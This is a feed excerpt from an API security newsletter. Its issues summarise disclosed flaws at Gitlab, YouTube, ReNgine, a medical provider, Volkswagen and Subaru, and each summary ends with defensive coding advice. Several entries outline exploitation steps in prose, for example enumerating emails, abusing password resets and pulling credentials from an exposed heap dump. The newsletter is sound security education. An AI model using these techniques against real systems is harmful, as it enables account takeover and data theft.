<p style="font-weight: 400;"><span style="font-weight: 400;">A defense-in-depth approach to API security would ensure that neither condition is met. API teams should follow secure coding practices to:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Validate input and constrain API query parameters to only accept expected and safe values, rejecting all other input by default.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Use recommended secure mechanisms like prepared statements or stored procedures to remove SQL injection risks.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">By consistently adopting security best practices, API teams can mitigate their exposure to SQL injection as well as other injection-based attacks. </span></p>
<h2><span style="font-weight: 400;">Article: Best Practices in API Development</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">An </span><a href="https://nordicapis.com/the-ultimate-guide-to-api-best-practices/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> by NordicAPIs outlines key best practices for API development, emphasizing security, efficiency and building APIs that are easy to consume. Some of the recommendations include:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">adopting consistent naming conventions</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">using HTTP methods appropriately</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">adopting the Principle of Least Privileges</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">planning for the full API lifecycle</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">In particular, the Principle of Least Privilege plays a crucial role in API security.  By ensuring that users, applications, and services only have the minimum permissions necessary, organizations can significantly reduce their exposure to Broken Object Level Authorization (BOLA) and Broken Function Level Authorization (BFLA) &#8211; two of the most exploited API vulnerabilities.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This article is a great refresher on API security fundamentals!</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Authorization Bug in Gitlab Password Reset API </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">I recently came across an interesting API security flaw on </span><a href="https://hackerone.com/reports/2293343" target="_blank" rel="noopener"><span style="font-weight: 400;">HackerOne</span></a><span style="font-weight: 400;">. The original report dates back to 2023, but the vulnerability was only disclosed this week.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The issue involved Gitlab&#8217;s password reset function. A user could intercept the underlying API request and modify the payload to add a second email address. This appears to be a feature rather than a bug, since Gitlab allows users to specify a secondary email address to receive password reset notifications.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, the feature contained a fundamental flaw. The relevant Gitlab </span><a href="https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/#account-takeover-via-password-reset-without-user-interactions" target="_blank" rel="noopener"><span style="font-weight: 400;">release notes</span></a><span style="font-weight: 400;"> provide more details about the vulnerability. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The API failed to verify whether the second email address was registered and authorized for the target account. This error allowed an attacker to request a password reset for another user&#8217;s account, while adding their own email address as a recipient for a password reset link. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This case highlights multiple ways APIs can be exploited, through business logic abuse as well as insufficient authorization controls at the object or resource level.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security testing can help to identify edge cases like these, where features could be exploited outside their intended use. </span></p>
<p>The post <a href="https://apisecurity.io/issue-266-api-governance-kyc-leak-at-the-post-office-sql-injection-bug-in-fintech-api-api-best-practices/">Issue 266: API governance, KYC leak at the Post Office, SQL injection bug in Fintech API, API best practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 265: YouTube API privacy bug, Medical records leaked, OpenAPI News, Spring Boot API impacts Volkswagen</title>
		<link>https://apisecurity.io/issue-265-youtube-api-privacy-bug-medical-records-leaked-openapi-news-spring-boot-api-impacts-volkswagen/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 13 Feb 2025 14:45:12 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11283</guid>

					<description><![CDATA[<p>This week, we focus on incidents of data exposure through vulnerable APIs. We examine a new report of data leaks in YouTube and Google APIs, vulnerabilities in open-source projects, and API hacks at healthcare and automotive companies. On a positive note, we share an update from the OpenAPI Initiative on the latest specifications for Overlays [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-265-youtube-api-privacy-bug-medical-records-leaked-openapi-news-spring-boot-api-impacts-volkswagen/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-265-youtube-api-privacy-bug-medical-records-leaked-openapi-news-spring-boot-api-impacts-volkswagen/">Issue 265: YouTube API privacy bug, Medical records leaked, OpenAPI News, Spring Boot API impacts Volkswagen</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we focus on incidents of data exposure through vulnerable APIs. We examine a new report of data leaks in YouTube and Google APIs, vulnerabilities in open-source projects, and API hacks at healthcare and automotive companies. On a positive note, we share an update from the OpenAPI Initiative on the latest specifications for Overlays and Arazzo.</span></p>
<h2><span style="font-weight: 400;">Industry News: OpenAPIs Overlays &amp; Arazzo Standards</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The OpenAPI folks have been busy! Lorna Mitchell, member of the OpenAPI Technical Steering Committee, </span><a href="https://thenewstack.io/openapi-initiative-new-standards-and-a-peek-at-the-roadmap/" target="_blank" rel="noopener"><span style="font-weight: 400;">shares her insights</span></a><span style="font-weight: 400;"> and some potential use cases for two new standards from the OpenAPI Initiative: Overlays and Arazzo. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Both specifications open a range of new opportunities and potential solutions for API quality, security, testing and governance. Lorna describes a number of possible use cases for Overlays to automate quality checks and process updates on OpenAPI documents. The concept reminds me of working with XSLT stylesheets, eons ago, to transform SOAP messages; though thankfully using Overlays looks far more simple in contrast.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Likewise, Arazzo offers, among other things, many new ways to improve API security testing by constructing and validating real-world business scenarios in sequences of linked API calls. Also, my colleague Philippe Leothaud </span><a href="https://www.linkedin.com/posts/philippe-leothaud_the-standard-specification-allowing-for-easy-activity-7292934621279739907-627e/" target="_blank" rel="noopener"><span style="font-weight: 400;">shared his observation</span></a><span style="font-weight: 400;"> on LinkedIn about how Arazzo has the potential to be an essential tool for building API infrastructure designed for AI consumption.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So, lots of exciting new capabilities and solutions in store for OpenAPI users!</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Leaky YouTube API nets Hacker $10,000</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A researcher </span><a href="https://brutecat.com/articles/leaking-youtube-emails" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> vulnerabilities in YouTube and Google APIs that exposed the private email address of anonymous YouTube accounts. Just for good measure, exploiting an additional API vulnerability also ensured targeted users were not notified about the attack. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">First, the vulnerable YouTube API accepted a public channel ID in the request and returned an internal Google account ID (Gaia) in the response. This was the key vulnerability since it effectively verified a Google account ID for an anonymous YouTuber.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Next, the researcher found a vulnerable Google API to accept a Google account ID and return that user’s email address. This API was used by an older Google product called Pixel Recorder for sharing videos with other users. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So in just two quick API requests, the private email address of an anonymous YouTuber was retrieved. Not so anonymous! </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the side effects of using the Pixel Recorder API was that it triggers an email notification to the targeted user whenever a video was shared, possibly alerting the user to the attack. The researchers found another API bug to prevent that email notification from being sent: setting an extremely long name for the title of the video. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The API failed to enforce practical limits on the length of the title, which allowed the request to be processed and the email address retrieved, but also prevented the email notification from being sent due to the excessive length of the title.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This case underscores how hackers probe and test an API’s input and output properties for vulnerabilities. It also highlights the importance of setting practical constraints on API parameters to mitigate the risk from such attacks. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Excessive Data Exposure in Vulnerability Scanner</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">API security often emphasizes validating user input. However, the API response data should also be inspected and validated to prevent unauthorized leaks of private data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent example of an API data exposure vulnerability was </span><a href="https://github.com/yogeshojha/rengine/security/advisories/GHSA-r3fp-xr9f-wv38" target="_blank" rel="noopener"><span style="font-weight: 400;">reported</span></a><span style="font-weight: 400;"> in ReNgine, an open-source reconnaissance and vulnerability scanner. The disclosure document provides a detailed breakdown of the bug, making it a valuable resource to learn about common API vulnerabilities. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this case, the API unintentionally returned excessive user information, including a password. This is similar to a </span><a href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/" target="_blank" rel="noopener"><span style="font-weight: 400;">previous case</span></a><span style="font-weight: 400;"> of API data exposure by the social media platform Spoutible.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One way to help avoid this is by consistently enforcing strict schema validation on API response messages. The task of defining a schema forces a developer to carefully consider what data should be allowed in the API response. This practice can help to uncover flaws and data leak vulnerabilities before APIs are pushed into production. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Credit to the ReNgine team for setting clear </span><a href="https://github.com/yogeshojha/rengine/security" target="_blank" rel="noopener"><span style="font-weight: 400;">guidelines</span></a><span style="font-weight: 400;"> for responsible disclosure and for quickly addressing the vulnerability. Credit also goes to the ethical hacker for documenting the issue in detail, providing the broader community with a valuable learning opportunity!</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API leaks Medical Records and PII </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://www.cloudsek.com/blog/exposed-how-a-single-api-flaw-put-millions-of-medical-records-at-risk#More-Than-Just-a-Data-Breach" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> highlights a case of medical records and patient PII (personally identifiable information) leaked through unprotected APIs. The API endpoints, along with security keys, were exposed in public Javascript files. If these are uncovered, since the APIs did not enforce authorization, a malicious user could leverage the APIs for unauthorized access.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In addition to lacking proper authorization checks, the vulnerable API was also designed to use sequential numbers to access patient records. This makes it extremely easy for a hacker to guess the IDs of patient records and use the API to perform mass data scraping. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Why were the APIs to sensitive medical records left unprotected? It may be that the API developers assumed the APIs would only ever be used by a trusted client, with examples of the API requests “hidden” deep inside Javascript files that no one was likely to find. But as shown in the report, tools are available to scan public web assets and uncover a hidden attack surface, including API calls.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This incident underscores a critical point for developers and security teams: even APIs intended for use solely by trusted clients must operate under the assumption that unauthorized actors will find those API endpoints and attempt to exploit them. API security should be baked into the API’s design with authorization and input validation, following principles of least privilege and zero trust.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Unsecured Spring Boot API impacts Volkswagen </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The European ethical hacking group Chaos Computer Club </span><a href="https://www.youtube.com/watch?v=gKvtJiU-mi4" target="_blank" rel="noopener"><span style="font-weight: 400;">reported</span></a><span style="font-weight: 400;"> how an unsecured Java framework API allowed them to access private keys that exposed location data of more than 800,000 Volkswagen vehicles, including vehicles used by law enforcement and prominent political figures. </span><span style="font-weight: 400;">The vulnerability traces to the Spring Boot framework and an exposed actuator API endpoint. Actuator endpoints are provided for application developers to monitor and debug an application. These endpoints are unrestricted by default, which shifts the burden of ensuring proper configuration and security onto developers using the framework. </span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">Here is a short summary of key points in the exploitation path.</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Researchers discovered an exposed Spring Boot actuator endpoint that required no authentication to access.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">This </span><a href="https://docs.spring.io/spring-boot/api/rest/actuator/heapdump.html" target="_blank" rel="noopener"><span style="font-weight: 400;">vulnerable endpoint</span></a><span style="font-weight: 400;"> allowed an unauthenticated user to access and download a snapshot of a Java application’s runtime memory, known as a heap dump.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Within the heap dump, researchers found AWS credentials for an S3 storage bucket, containing 9.5TB of telemetric data, including detailed geo data (about 800,000 cars dumped their telemetry data every 24 hours).</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Additionally, the heap dump exposed client IDs and secrets, which could be used to generate JWT tokens and access other APIs to retrieve private user data.</span><span style="font-weight: 400;"><br />
</span></li>
</ul>
<p style="font-weight: 400;"><a href="https://www.ncsc.gov.uk/information/secure-default" target="_blank" rel="noopener"><span style="font-weight: 400;">Secure-by-default</span></a><span style="font-weight: 400;"> is an approach to technology development that advocates security being enabled by default, without users having to turn it on. This approach would ensure that security controls are enabled and properly configured out of the box. Unfortunately, this is not the case for many 3rd party dependencies, including frameworks, libraries and Cloud platforms, so users must review and ensure appropriate security controls are enabled.</span><span style="font-weight: 400;"><br />
</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Tip of the hat to 42Crunch’s Axel Grosse for contributing to the review of this case.</span></p>
<h2><span style="font-weight: 400;">Webinar: API Security for the Connected Vehicle Ecosystem </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">I&#8217;m thrilled to connect with automotive cybersecurity expert Darren Shelcusky to explore his deep expertise and valuable insights on successfully driving API security and DevSecOps programs in the automotive industry. <a href="https://42crunch.com/api-security-insights-connected-vehicle-ecosystem/" target="_blank" rel="noopener">Register for next week&#8217;s webinar</a></span></p>
<p><a href="https://42crunch.com/api-security-insights-connected-vehicle-ecosystem/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11277" src="https://apisecurity.io/wp-content/uploads/2025/01/API-security-for-automotive-vehicle-Connected-Ecosystem-300x168.png" alt="" width="801" height="449" srcset="https://apisecurity.io/wp-content/uploads/2025/01/API-security-for-automotive-vehicle-Connected-Ecosystem-300x168.png 300w, https://apisecurity.io/wp-content/uploads/2025/01/API-security-for-automotive-vehicle-Connected-Ecosystem-768x430.png 768w, https://apisecurity.io/wp-content/uploads/2025/01/API-security-for-automotive-vehicle-Connected-Ecosystem.png 1018w" sizes="auto, (max-width: 801px) 100vw, 801px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-265-youtube-api-privacy-bug-medical-records-leaked-openapi-news-spring-boot-api-impacts-volkswagen/">Issue 265: YouTube API privacy bug, Medical records leaked, OpenAPI News, Spring Boot API impacts Volkswagen</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 264: Pwn2Own Automotive 2025, Subaru APIs hacked, DevSecOps for the connected vehicle</title>
		<link>https://apisecurity.io/issue-264-pwn2own-automotive-2025-subaru-apis-hacked-devsecops-for-the-connected-vehicle/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 30 Jan 2025 16:59:27 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11276</guid>

					<description><![CDATA[<p>This week, we focus on automotive cybersecurity. Guest contributor Ling Cheng of VicOne shares the security benefits of the Pwn2Own Automotive event. We explore Sam Curry&#8217;s success uncovering API flaws at Subaru; car hacking as a career choice;  and CISA director Jen Easterly’s case for secure design, inspired by automotive safety. In February, I’ll chat [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-264-pwn2own-automotive-2025-subaru-apis-hacked-devsecops-for-the-connected-vehicle/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-264-pwn2own-automotive-2025-subaru-apis-hacked-devsecops-for-the-connected-vehicle/">Issue 264: Pwn2Own Automotive 2025, Subaru APIs hacked, DevSecOps for the connected vehicle</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we focus on automotive cybersecurity. Guest contributor Ling Cheng of VicOne shares the security benefits of the Pwn2Own Automotive event. We explore Sam Curry&#8217;s success uncovering API flaws at Subaru; car hacking as a career choice;  and CISA director Jen Easterly’s case for secure design, inspired by automotive safety. In February, I’ll chat with automotive cybersecurity expert Darren Shelcusky for his insights about API security and DevSecOps for the connected vehicle ecosystem. </span></p>
<h2><span style="font-weight: 400;">Industry News: Pwn2Own contest enhances automotive security </span></h2>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">By guest contributor </span></i><b><i>Ling Cheng</i></b><i><span style="font-weight: 400;">, Sr. Product Marketing Manager at VicOne Inc.</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As software-defined vehicles (SDVs) become more prevalent, concerns over vulnerabilities and the risks of cyberattacks are increasing. By identifying zero-day vulnerabilities through contests like Pwn2Own Automotive, VicOne aims to strengthen security measures, promote cyberattack prevention, and lay the foundation for the future of vehicle security. These events allow zero-day vulnerabilities to be identified early, before they circulate in underground markets, enabling swift countermeasures to mitigate damage and enhance product security.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is why VicOne&#8217;s collaboration with Trend Micro&#8217;s Zero Day Initiative (ZDI) vulnerability research community, to host Pwn2Own Automotive is so impactful. World-class security researchers conduct real-world testing of the latest automotive technologies to uncover zero-day vulnerabilities before they can be exploited. In just three days, 49 unique zero-day vulnerabilities were identified— exceeding the total discovered in 2023. By bringing these issues to light, Pwn2Own Automotive plays a key role in improving cybersecurity and building safer, more resilient vehicles. As the industry evolves, proactive risk management like this must be a priority for every automaker.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Read our blog for firsthand insights on the discoveries made during these three days.</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Day 1: 16 automotive zero day vulnerabilities uncovered </span><a href="https://www.vicone.com/blog/pwn2own-automotive-2025-day-one-uncovers-16-automotive-zero-day-vulnerabilities" target="_blank" rel="noopener"><span style="font-weight: 400;">read more  </span></a></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Day 2: Tesla EV charger exploits take the spotlight </span><a href="https://www.vicone.com/blog/pwn2own-automotive-2025-tesla-ev-charger-exploits-take-the-spotlight-on-day-two" target="_blank" rel="noopener"><span style="font-weight: 400;">read more</span></a></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Day 3:</span><a href="https://www.vicone.com/blog/pwn2own-automotive-2025-new-master-of-pwn-crowned-and-other-day-three-highlights" target="_blank" rel="noopener"><span style="font-weight: 400;"> New master of Pwn crowned and other day three highlights </span><span style="font-weight: 400;">read more</span> </a></li>
</ul>
<h2><span style="font-weight: 400;">Article: Vehicle cybersecurity skills are in demand</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Vehicle electrification and connectivity are in high demand, with </span><a href="https://www.mckinsey.com/industries/automotive-and-assembly/our-insights/corporate-business-building-to-unlock-value-in-automotive-connectivity" target="_blank" rel="noopener"><span style="font-weight: 400;">projections</span></a><span style="font-weight: 400;"> showing that by 2030, “95 percent of new vehicles sold globally will be connected”. However, this connectivity also expands the attack surface and increases the risks to vehicle owners from cyber attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Meanwhile, regulations such as the US Cybersecurity Improvement Act and UNECE WP.29 in Europe are driving the need for automotive cybersecurity experts. In his </span><a href="https://securityboulevard.com/2025/01/the-future-of-automotive-cybersecurity-why-learning-car-hacking-is-essential/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;">, CISO Luciano Ferrari makes the case for upskilling in vehicle hacking techniques as a critical career path.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Another key area offering a path into the automotive industry is API security</span><b>,</b><span style="font-weight: 400;"> essential for safeguarding connected vehicles. With APIs now pervasive across the automotive ecosystem, skills in secure API design and development are crucial to preventing unauthorized access and cyber threats, and protecting drivers and their connected vehicles. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Researchers exploit API design bugs at Subaru </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security researchers Sam Curry and Shubham Shah recently </span><a href="https://samcurry.net/hacking-subaru" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> critical API vulnerabilities in an employee website of automobile manufacturer Subaru. These flaws allowed unauthenticated users to remotely control vehicles in the United States, Japan, and Canada. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The attack leveraged two key API vulnerabilities. The first step involved identifying a valid Subaru employee email address. These could be guessed with a simple LinkedIn search, but verification was possible through an auth API endpoint that returned an error message if the address was invalid, but a different response if it was valid. This behavior enabled attackers to systematically guess email addresses until they found one that was valid, a classic account enumeration vulnerability. OWASP provides useful </span><a href="https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages" target="_blank" rel="noopener"><span style="font-weight: 400;">guidelines</span></a><span style="font-weight: 400;"> for error messages.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Once a valid employee email address was identified, the researchers exploited a second flaw: the password reset endpoint. This endpoint allowed attackers to request a password reset for any registered email address without requiring any user verification. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This vulnerability is another well-documented security issue flagged in OWASP </span><a href="https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html#methods" target="_blank" rel="noopener"><span style="font-weight: 400;">guidelines</span></a><span style="font-weight: 400;">:  “In order to allow a user to request a password reset, you will need to have some way to identify the user”.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By exploiting these two vulnerabilities, the researchers obtained employee credentials, granting them access to the Subaru employee portal. From there, they gained remote administrator privileges over customer vehicles.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Basic security controls can be defined during the API design phase and documented as part of the development lifecycle. Security teams can use the documentation as a foundation for testing and validating API security before deployment. Such collaboration between security and development can help to prevent blatant security vulnerabilities in production APIs.</span></p>
<h2><span style="font-weight: 400;">Article: What vehicle safety can teach us about API security</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In her article &#8220;</span><a href="https://www.cisa.gov/news-events/news/building-secure-design-ecosystem" target="_blank" rel="noopener"><span style="font-weight: 400;">Building a Secure by Design Ecosystem</span></a><span style="font-weight: 400;">”, CISA Director Jen Easterly draws parallels between the evolution of automotive safety in the 1960s and the current state of software security, noting that we are </span><span style="font-weight: 400;">in the “before seat belts” era of software development.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Much like the auto industry&#8217;s shift to safety features like seatbelts and anti-lock brakes to prevent accidents, Easterly argues that the software industry must prioritize secure design principles to prevent vulnerabilities. Drawing from her own software development experience at the US Army, the Intelligence community and Morgan Stanley, she reports the “undeniable” results from investing in secure software design and development practices. </span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“We don’t have a cybersecurity problem; we have a software quality problem”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Strict regulations for functional safety govern the development of automotive software, with the goal of minimizing bugs and producing high quality and predictable (i.e. safe) software. That outcome is achieved through mandated software engineering practices like requirements verification, traceability, and testing.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The same principles apply to API security. The vulnerabilities and preventive practices are well documented. The challenge now is embedding security into the fabric of API development, from the first line of code to deployment, making it, as Easterly puts it, “a core identity for software developers.”</span></p>
<h2><span style="font-weight: 400;">Webinar: API Security for the Connected Vehicle Ecosystem </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">I&#8217;m thrilled to connect with automotive cybersecurity expert Darren Shelcusky to explore his deep expertise and valuable insights on successfully driving API security and DevSecOps programs in the automotive industry. <a href="https://42crunch.com/api-security-insights-connected-vehicle-ecosystem/" target="_blank" rel="noopener">Register</a></span></p>
<p><a href="https://42crunch.com/api-security-insights-connected-vehicle-ecosystem/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11277" src="https://apisecurity.io/wp-content/uploads/2025/01/API-security-for-automotive-vehicle-Connected-Ecosystem-300x168.png" alt="" width="801" height="449" srcset="https://apisecurity.io/wp-content/uploads/2025/01/API-security-for-automotive-vehicle-Connected-Ecosystem-300x168.png 300w, https://apisecurity.io/wp-content/uploads/2025/01/API-security-for-automotive-vehicle-Connected-Ecosystem-768x430.png 768w, https://apisecurity.io/wp-content/uploads/2025/01/API-security-for-automotive-vehicle-Connected-Ecosystem.png 1018w" sizes="auto, (max-width: 801px) 100vw, 801px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-264-pwn2own-automotive-2025-subaru-apis-hacked-devsecops-for-the-connected-vehicle/">Issue 264: Pwn2Own Automotive 2025, Subaru APIs hacked, DevSecOps for the connected vehicle</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 263: Trellix &#038; Aviatrix API exploits, API risks in education, API configuration bugs &#038; secure coding practices</title>
		<link>https://apisecurity.io/issue-263-trellix-aviatrix-api-exploits-api-risks-in-education-api-configuration-bugs-secure-coding-practices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 16 Jan 2025 16:19:25 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11271</guid>

					<description><![CDATA[<p>This week, we have an interesting article on the dangers of API integrations in the education sector, and we cover recent incidents involving API vulnerabilities in two popular security platforms from Trellix and Aviatrix. We highlight a recent article by NordicAPIs on API misconfiguration vulnerabilities, and we share a useful list of recommended coding practices [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-263-trellix-aviatrix-api-exploits-api-risks-in-education-api-configuration-bugs-secure-coding-practices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-263-trellix-aviatrix-api-exploits-api-risks-in-education-api-configuration-bugs-secure-coding-practices/">Issue 263: Trellix &#038; Aviatrix API exploits, API risks in education, API configuration bugs &#038; secure coding practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have an interesting article on the dangers of API integrations in the education sector, and we cover recent incidents involving API vulnerabilities in two popular security platforms from Trellix and Aviatrix. We highlight a recent article by NordicAPIs on API misconfiguration vulnerabilities, and we share a useful list of recommended coding practices to remove common API vulnerabilities.</span></p>
<h2><span style="font-weight: 400;">Article: Universities are vulnerable to API attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs are the backbone of integrations between diverse systems and applications, providing a standardized framework for data sharing. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This </span><a href="https://edtechmagazine.com/higher/article/2024/12/api-attacks-what-are-they-how-universities-prepare-perfcon" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> explores the risks associated with API integrations in the education sector. It talks about APIs consolidating data from multiple sources into a single unified experience, to benefit students&#8217; productivity. But, poorly implemented integrations can introduce vulnerabilities. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The education sector has increasingly become a target for cyberattacks. A 2023 Malwarebytes </span><a href="https://www.threatdown.com/blog/2024-state-of-ransomware-in-education-92-spike-in-k-12-attacks/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> revealed a 70% rise in attacks on educational institutions, underscoring the growing need for robust cybersecurity measures.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the key vulnerabilities discussed in the article is a common oversight in API design. When APIs are intended for direct consumption by external users, such as third-party developers, the need for strong security controls is often apparent. However, when APIs are designed for consumption by trusted, authorized users, developers often make the mistake of omitting those essential security controls, because they assume, incorrectly, that all incoming requests are valid.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Our research at APISecurity.io frequently highlights this issue, particularly with mobile applications. Developers often assume that requests come only from trusted clients. However, attackers can easily bypass client-side security controls and directly exploit vulnerable APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article emphasizes that secure APIs must be inherently self-protective. All user input should undergo rigorous inspection and validation within the API itself. API security should never be offloaded to the client.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API bugs in Trellix Enterprise Security Manager</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://hackerone.com/reports/2817658" target="_blank" rel="noopener"><span style="font-weight: 400;">disclosure</span></a><span style="font-weight: 400;"> on the HackerOne platform highlights two API vulnerabilities in the Trellix Enterprise Security Manager (ESM). These vulnerabilities were ethically reported by a researcher and addressed by Trellix in a November software update.</span></p>
